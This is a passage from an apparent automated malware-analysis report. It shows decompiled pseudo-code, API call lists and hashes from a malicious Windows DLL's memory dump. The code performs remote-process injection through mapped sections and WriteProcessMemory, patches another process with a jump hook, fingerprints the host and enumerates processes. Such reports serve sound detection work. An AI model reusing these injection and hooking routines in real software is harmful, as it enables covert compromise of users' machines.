                                    				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                    					_t126 = _v20;
                                    					goto L12;
                                    				} else {
                                    					_t126 = _v20;
                                    					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                    						goto L12;
                                    					}
                                    					_t140 = E10008669( *0x1001e688, 0x1ac4);
                                    					_v32 = _t140;
                                    					if(_t140 == 0) {
                                    						goto L12;
                                    					}
                                    					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                    					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
                                    					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                    					E1000861A( &_v32, 0x1ac4);
                                    					_t141 =  *0x1001e688; // 0x7900590
                                    					 *0x1001e688 = _t131;
                                    					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                    					E1000C63F(_v12, _v8, _v36);
                                    					 *0x1001e688 = _t141;
                                    					goto L14;
                                    				}
                                    			}

                                    APIs
                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                                    • RegisterClassExA.USER32 ref: 1000C785
                                    • CreateWindowExA.USER32 ref: 1000C7B0
                                    • DestroyWindow.USER32 ref: 1000C7BB
                                    • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                                    • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                                    • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                                    • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                                      • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                                    • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                                    • NtClose.NTDLL(00000000), ref: 1000C8F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                                    • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                    • API String ID: 2002808388-2319545179
                                    • Opcode ID: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
                                    • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                                    • Opcode Fuzzy Hash: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
                                    • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                    				long _v8;
                                    				long _v12;
                                    				void* _v16;
                                    				intOrPtr _v23;
                                    				void _v24;
                                    				long _v28;
                                    				void* _v568;
                                    				void _v744;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				struct HINSTANCE__* _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr _t35;
                                    				void* _t39;
                                    				intOrPtr _t43;
                                    				void* _t63;
                                    				long _t65;
                                    				void* _t70;
                                    				void** _t73;
                                    				void* _t74;
                                    
                                    				_t73 = __edx;
                                    				_t63 = __ecx;
                                    				_t74 = 0;
                                    				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
                                    					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
                                    					_t74 = _t39;
                                    					if(_t74 != 0) {
                                    						memset( &_v744, 0, 0x2cc);
                                    						_v744 = 0x10002;
                                    						_push( &_v744);
                                    						_t43 =  *0x1001e684; // 0x797faa0
                                    						_push(_t73[1]);
                                    						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
                                    							_t70 = _v568;
                                    							_v12 = _v12 & 0x00000000;
                                    							_v24 = 0xe9;
                                    							_t65 = 5;
                                    							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
                                    							_v8 = _t65;
                                    							_v16 = _t70;
                                    							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
                                    								L6:
                                    								_t74 = 0;
                                    							} else {
                                    								_v28 = _v28 & 0x00000000;
                                    								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                    									goto L6;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				_t32 =  *0x1001e77c; // 0x0
                                    				if(_t32 != 0) {
                                    					FreeLibrary(_t32);
                                    					 *0x1001e77c =  *0x1001e77c & 0x00000000;
                                    				}
                                    				_t33 =  *0x1001e784; // 0x0
                                    				if(_t33 != 0) {
                                    					_t35 =  *0x1001e684; // 0x797faa0
                                    					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
                                    					E1000861A(0x1001e784, 0xfffffffe);
                                    				}
                                    				return _t74;
                                    			}

























                                    APIs
                                      • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                                      • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                                      • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                                      • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                                      • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                                      • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                                      • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                                    • memset.MSVCRT ref: 1000CBB8
                                    • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                                    • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                                    • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                                    • String ID:
                                    • API String ID: 317994034-0
                                    • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                                    • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                                    • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                                    • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E100030B7() {
                                    				int _t3;
                                    				struct _SERVICE_TABLE_ENTRY* _t6;
                                    				int* _t11;
                                    				intOrPtr _t12;
                                    
                                    				_t3 = E10008604(0x10);
                                    				 *0x1001e71c = _t3;
                                    				if(_t3 == 0) {
                                    					L4:
                                    					return _t3 | 0xffffffff;
                                    				} else {
                                    					_t3 = E10008604(0xa);
                                    					_t11 =  *0x1001e71c; // 0x79236e0
                                    					 *_t11 = _t3;
                                    					if(_t3 == 0) {
                                    						goto L4;
                                    					} else {
                                    						_t12 =  *0x1001e688; // 0x7900590
                                    						E1000902D(1, _t3, 7, 8, _t12 + 0x648);
                                    						_t6 =  *0x1001e71c; // 0x79236e0
                                    						 *((intOrPtr*)(_t6 + 4)) = E10003052;
                                    						_t3 = StartServiceCtrlDispatcherA(_t6);
                                    						if(_t3 == 0) {
                                    							goto L4;
                                    						} else {
                                    							return 0;
                                    						}
                                    					}
                                    				}
                                    			}








                                    APIs
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    • StartServiceCtrlDispatcherA.ADVAPI32(079236E0), ref: 1000310C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocCtrlDispatcherHeapServiceStart
                                    • String ID:
                                    • API String ID: 3270895466-0
                                    • Opcode ID: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
                                    • Instruction ID: ac16b269da70e1785f3d8de3b20eaf3184fc588054e4d94b314cf4149a8ccc23
                                    • Opcode Fuzzy Hash: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
                                    • Instruction Fuzzy Hash: 59F03AB42443428BF748CB74DC92B5A3398EB44394F55C128E615CB2D5EE75D8128A14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E1000D01F(void* __fp0) {
                                    				long _v8;
                                    				long _v12;
                                    				union _SID_NAME_USE _v16;
                                    				struct _SYSTEM_INFO _v52;
                                    				char _v180;
                                    				short _v692;
                                    				char _v704;
                                    				char _v2680;
                                    				void* __esi;
                                    				struct _OSVERSIONINFOA* _t81;
                                    				intOrPtr _t83;
                                    				void* _t84;
                                    				long _t86;
                                    				void** _t88;
                                    				intOrPtr _t90;
                                    				intOrPtr _t91;
                                    				intOrPtr _t92;
                                    				intOrPtr _t97;
                                    				void* _t98;
                                    				intOrPtr _t103;
                                    				char* _t105;
                                    				void* _t108;
                                    				intOrPtr _t111;
                                    				long _t115;
                                    				signed int _t117;
                                    				long _t119;
                                    				intOrPtr _t124;
                                    				intOrPtr _t127;
                                    				intOrPtr _t130;
                                    				intOrPtr _t134;
                                    				intOrPtr _t145;
                                    				intOrPtr _t147;
                                    				intOrPtr _t149;
                                    				intOrPtr _t152;
                                    				intOrPtr _t154;
                                    				signed int _t159;
                                    				struct HINSTANCE__* _t162;
                                    				short* _t164;
                                    				intOrPtr _t167;
                                    				WCHAR* _t168;
                                    				char* _t169;
                                    				intOrPtr _t181;
                                    				intOrPtr _t200;
                                    				void* _t215;
                                    				long _t218;
                                    				void* _t219;
                                    				char* _t220;
                                    				struct _OSVERSIONINFOA* _t222;
                                    				void* _t223;
                                    				int* _t224;
                                    				void* _t241;
                                    
                                    				_t241 = __fp0;
                                    				_t162 =  *0x1001e69c; // 0x10000000
                                    				_t81 = E10008604(0x1ac4);
                                    				_t222 = _t81;
                                    				if(_t222 == 0) {
                                    					return _t81;
                                    				}
                                    				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                    				_t83 =  *0x1001e684; // 0x797faa0
                                    				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                    				_t3 = _t222 + 0x648; // 0x648
                                    				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                    				_t5 = _t222 + 0x1644; // 0x1644
                                    				_t216 = _t5;
                                    				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                    				_t227 = _t86;
                                    				if(_t86 != 0) {
                                    					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
                                    				}
                                    				GetCurrentProcess();
                                    				_t88 = E1000BA05(); // executed
                                    				 *(_t222 + 0x110) = _t88;
                                    				_t178 =  *_t88;
                                    				if(E1000BB8D( *_t88) == 0) {
                                    					_t90 = E1000BA62(_t178, _t222);
                                    					__eflags = _t90;
                                    					_t181 = (0 | _t90 > 0x00000000) + 1;
                                    					__eflags = _t181;
                                    					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                    				} else {
                                    					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                                    				}
                                    				_t12 = _t222 + 0x220; // 0x220, executed
                                    				_t91 = E1000E3F1(_t12); // executed
                                    				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
                                    				_t92 = E1000E3B6(_t12); // executed
                                    				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
                                    				 *(_t222 + 0x224) = _t162;
                                    				_v12 = 0x80;
                                    				_v8 = 0x100;
                                    				_t22 = _t222 + 0x114; // 0x114
                                    				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
                                    					GetLastError();
                                    				}
                                    				_t97 =  *0x1001e694; // 0x797fbf8
                                    				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                                    				_t26 = _t222 + 0x228; // 0x228
                                    				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                    				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                    				GetLastError();
                                    				_t31 = _t222 + 0x228; // 0x228
                                    				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
                                    				_t34 = _t222 + 0x114; // 0x114, executed
                                    				_t103 = E1000B7A8(_t34,  &_v692);
                                    				_t35 = _t222 + 0xb0; // 0xb0
                                    				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                    				_push(_t35);
                                    				E1000B67D(_t103, _t35, _t98, _t241);
                                    				_t37 = _t222 + 0xb0; // 0xb0
                                    				_t105 = _t37;
                                    				_t38 = _t222 + 0xd0; // 0xd0
                                    				_t164 = _t38;
                                    				if(_t105 != 0) {
                                    					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                    					if(_t159 > 0) {
                                    						_t164[_t159] = 0;
                                    					}
                                    				}
                                    				_t41 = _t222 + 0x438; // 0x438
                                    				_t42 = _t222 + 0x228; // 0x228
                                    				E10008FD8(_t42, _t41);
                                    				_t43 = _t222 + 0xb0; // 0xb0
                                    				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
                                    				_t44 = _t222 + 0x100c; // 0x100c
                                    				E1000B88A(_t108, _t44, _t241);
                                    				_t199 = GetCurrentProcess(); // executed
                                    				_t111 = E1000BBDF(_t110); // executed
                                    				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
                                    				memset(_t222, 0, 0x9c);
                                    				_t224 = _t223 + 0xc;
                                    				_t222->dwOSVersionInfoSize = 0x9c;
                                    				GetVersionExA(_t222);
                                    				_t167 =  *0x1001e684; // 0x797faa0
                                    				_t115 = 0;
                                    				_v8 = 0;
                                    				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                    					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                    					_t115 = _v8;
                                    				}
                                    				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                    				if(_t115 == 0) {
                                    					GetSystemInfo( &_v52);
                                    					_t117 = _v52.dwOemId & 0x0000ffff;
                                    				} else {
                                    					_t117 = 9;
                                    				}
                                    				_t54 = _t222 + 0x1020; // 0x1020
                                    				_t168 = _t54;
                                    				 *(_t222 + 0x9c) = _t117;
                                    				GetWindowsDirectoryW(_t168, 0x104);
                                    				_t119 = E100095E1(_t199, 0x10c);
                                    				_t200 =  *0x1001e684; // 0x797faa0
                                    				_t218 = _t119;
                                    				 *_t224 = 0x104;
                                    				_push( &_v704);
                                    				_push(_t218);
                                    				_v8 = _t218;
                                    				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                    					_t154 =  *0x1001e684; // 0x797faa0
                                    					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                    				}
                                    				E100085D5( &_v8);
                                    				_t124 =  *0x1001e684; // 0x797faa0
                                    				_t61 = _t222 + 0x1434; // 0x1434
                                    				_t219 = _t61;
                                    				 *_t224 = 0x209;
                                    				_push(_t219);
                                    				_push(L"USERPROFILE");
                                    				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                    					E10009640(_t219, 0x105, L"%s\\%s", _t168);
                                    					_t152 =  *0x1001e684; // 0x797faa0
                                    					_t224 =  &(_t224[5]);
                                    					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                    				}
                                    				_push(0x20a);
                                    				_t64 = _t222 + 0x122a; // 0x122a
                                    				_t169 = L"TEMP";
                                    				_t127 =  *0x1001e684; // 0x797faa0
                                    				_push(_t169);
                                    				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                    					_t149 =  *0x1001e684; // 0x797faa0
                                    					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                    				}
                                    				_push(0x40);
                                    				_t220 = L"SystemDrive";
                                    				_push( &_v180);
                                    				_t130 =  *0x1001e684; // 0x797faa0
                                    				_push(_t220);
                                    				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                    					_t147 =  *0x1001e684; // 0x797faa0
                                    					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                    				}
                                    				_v8 = 0x7f;
                                    				_t72 = _t222 + 0x199c; // 0x199c
                                    				_t134 =  *0x1001e684; // 0x797faa0
                                    				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                    				_t75 = _t222 + 0x100c; // 0x100c
                                    				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
                                    				_t76 = _t222 + 0x1858; // 0x1858
                                    				E100122D3( &_v2680, _t76, 0x20);
                                    				_t79 = _t222 + 0x1878; // 0x1878
                                    				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
                                    				_t145 = E1000CD33(_t79); // executed
                                    				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
                                    				return _t222;
                                    			}























































                                    APIs
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    • GetCurrentProcessId.KERNEL32 ref: 1000D046
                                    • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                                    • GetCurrentProcess.KERNEL32 ref: 1000D09F
                                    • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                                    • GetLastError.KERNEL32 ref: 1000D13E
                                    • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                                    • GetLastError.KERNEL32 ref: 1000D172
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                                    • GetCurrentProcess.KERNEL32 ref: 1000D20E
                                    • memset.MSVCRT ref: 1000D229
                                    • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                                    • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                                    • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                                    • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharDirectoryHeapInfoLookupMultiSystemVersionWideWindowsmemset
                                    • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                    • API String ID: 1775177207-2706916422
                                    • Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                                    • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                                    • Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                                    • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                    				long _v8;
                                    				char _v16;
                                    				short _v144;
                                    				short _v664;
                                    				void* _t19;
                                    				struct HINSTANCE__* _t22;
                                    				long _t23;
                                    				long _t24;
                                    				char* _t27;
                                    				WCHAR* _t32;
                                    				long _t33;
                                    				void* _t38;
                                    				void* _t49;
                                    				struct _SECURITY_ATTRIBUTES* _t53;
                                    				void* _t54;
                                    				intOrPtr* _t55;
                                    				void* _t57;
                                    
                                    				_t49 = __edx;
                                    				OutputDebugStringA("Hello qqq"); // executed
                                    				if(_a8 != 1) {
                                    					if(_a8 != 0) {
                                    						L12:
                                    						return 1;
                                    					}
                                    					SetLastError(0xaa);
                                    					L10:
                                    					return 0;
                                    				}
                                    				E100085EF();
                                    				_t19 = E1000980C( &_v16);
                                    				_t57 = _t49;
                                    				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                    					goto L12;
                                    				} else {
                                    					E10008F78();
                                    					GetModuleHandleA(0);
                                    					_t22 = _a4;
                                    					 *0x1001e69c = _t22;
                                    					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                    					_t24 = GetLastError();
                                    					if(_t23 != 0 && _t24 != 0x7a) {
                                    						memset( &_v144, 0, 0x80);
                                    						_t55 = _t54 + 0xc;
                                    						_t53 = 0;
                                    						do {
                                    							_t27 = E100095C7(_t53);
                                    							_a8 = _t27;
                                    							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                    							E100085C2( &_a8);
                                    							_t53 =  &(_t53->nLength);
                                    						} while (_t53 < 0x2710);
                                    						E10012A5B( *0x1001e69c);
                                    						 *_t55 = 0x7c3;
                                    						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
                                    						 *_t55 = 0xb4e;
                                    						_t32 = E100095E1(0x1001ba28);
                                    						_a8 = _t32;
                                    						_t33 = GetFileAttributesW(_t32); // executed
                                    						_push( &_a8);
                                    						if(_t33 == 0xffffffff) {
                                    							E100085D5();
                                    							_v8 = 0;
                                    							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
                                    							 *0x1001e6a8 = _t38;
                                    							if(_t38 == 0) {
                                    								goto L10;
                                    							}
                                    							goto L12;
                                    						}
                                    						E100085D5();
                                    					}
                                    					goto L10;
                                    				}
                                    			}





















                                    APIs
                                    • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                                    • SetLastError.KERNEL32(000000AA), ref: 100060D7
                                      • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                                      • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                                      • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                                    • GetLastError.KERNEL32 ref: 10005FEF
                                    • memset.MSVCRT ref: 10006013
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                                    • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                    • String ID: Hello qqq
                                    • API String ID: 3435743081-3610097158
                                    • Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                                    • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                                    • Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                                    • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E1000B7A8(WCHAR* __ecx, void* __edx) {
                                    				long _v8;
                                    				long _v12;
                                    				WCHAR* _v16;
                                    				short _v528;
                                    				short _v1040;
                                    				short _v1552;
                                    				WCHAR* _t27;
                                    				signed int _t29;
                                    				void* _t33;
                                    				long _t38;
                                    				WCHAR* _t43;
                                    				WCHAR* _t56;
                                    
                                    				_t44 = __ecx;
                                    				_v8 = _v8 & 0x00000000;
                                    				_t43 = __edx;
                                    				_t56 = __ecx;
                                    				memset(__edx, 0, 0x100);
                                    				_v12 = 0x100;
                                    				GetComputerNameW( &_v528,  &_v12);
                                    				lstrcpynW(_t43,  &_v528, 0x100);
                                    				_t27 = E100095E1(_t44, 0xa88);
                                    				_v16 = _t27;
                                    				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                    				asm("sbb eax, eax");
                                    				_v8 = _v8 &  ~_t29;
                                    				E100085D5( &_v16);
                                    				_t33 = E1000C392(_t43);
                                    				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                                    				lstrcatW(_t43, _t56);
                                    				_t38 = E1000C392(_t43);
                                    				_v12 = _t38;
                                    				CharUpperBuffW(_t43, _t38);
                                    				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
                                    			}
















                                    APIs
                                    • memset.MSVCRT ref: 1000B7C5
                                    • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                                    • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                                    • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                                      • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                                    • lstrcatW.KERNEL32 ref: 1000B85A
                                    • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                    • String ID:
                                    • API String ID: 3410906232-0
                                    • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                                    • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                                    • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                                    • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E1000ABA3(intOrPtr __ecx, void* __edx) {
                                    				void* _v304;
                                    				void* _v308;
                                    				signed int _t14;
                                    				signed int _t15;
                                    				void* _t22;
                                    				intOrPtr _t28;
                                    				void* _t31;
                                    				intOrPtr _t33;
                                    				void* _t40;
                                    				void* _t42;
                                    
                                    				_t33 = __ecx;
                                    				_t31 = __edx; // executed
                                    				_t14 = CreateToolhelp32Snapshot(2, 0);
                                    				_t42 = _t14;
                                    				_t15 = _t14 | 0xffffffff;
                                    				if(_t42 != _t15) {
                                    					memset( &_v304, 0, 0x128);
                                    					_v304 = 0x128;
                                    					if(Process32First(_t42,  &_v304) != 0) {
                                    						while(1) {
                                    							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
                                    							_t40 = _t22;
                                    							if(_t40 == 0) {
                                    								break;
                                    							}
                                    							_t33 =  *0x1001e684; // 0x797faa0
                                    							if(Process32Next(_t42,  &_v308) != 0) {
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						CloseHandle(_t42);
                                    						_t15 = 0 | _t40 == 0x00000000;
                                    					} else {
                                    						_t28 =  *0x1001e684; // 0x797faa0
                                    						 *((intOrPtr*)(_t28 + 0x30))(_t42);
                                    						_t15 = 0xfffffffe;
                                    					}
                                    				}
                                    				return _t15;
                                    			}














                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                                    • memset.MSVCRT ref: 1000ABD6
                                    • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                                    • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                                    • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                                    Memory Dump Source
